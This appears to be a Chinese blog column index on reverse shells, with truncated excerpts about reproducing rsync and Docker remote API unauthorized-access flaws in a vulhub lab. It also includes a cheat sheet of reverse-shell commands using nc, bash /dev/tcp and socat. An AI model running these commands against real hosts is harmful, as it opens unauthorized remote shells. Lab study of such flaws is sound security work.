shell反弹
文章平均质量分 61
龍66
这个作者很懒,什么都没留下…
展开
-
rsync未授权漏洞复现
漏洞简介:rsync是linux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他ssh、rsync主机同步。该协议默认监听873端口,如果目标开启rsync,并且没有配置ACL或访问密码,就可以未授权读写目标服务器文件。环境搭建:本此环境使用docker-vulhub进入vulhub-rsync,运行docker-compose up -d环境搭建完成后,用nmap扫描一下,发现服务已经启动漏洞复现1.列出模块下的文件2.下载任意文件rsync r原创 2022-03-31 16:15:03 · 5803 阅读 · 0 评论 -
vluhub之docker-unauthoriun-rce复现
1.漏洞简介:该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url实现docker命令。2.漏洞复现环境介绍:1.攻击机kali:192.168.231.1282.靶机ubuntu:192.168.231.185靶场搭建(1):ubuntu下载vluhubvulhub官网地址:https://vulhub.orggithub下载:https://github.com/vulhub/vulh原创 2021-08-07 11:56:12 · 1502 阅读 · 0 评论 -
反弹shell命令总结
反弹shell命令总结1.nc反弹开启本地8080端口监听,并将本地的bash发布出去。root# nc -lvvp 8080 -t -e /bin/bash连接目标主机nc ip 端口2.bash直接反弹kali监听靶机运行:root# bash -i >& /dev/tcp/ip/端口 0>&1bash命令解析:反弹成功3. socat反弹kali监听:socat tcp-listen:1234 -靶机运行:socat exec:‘原创 2021-04-28 16:33:52 · 1265 阅读 · 1 评论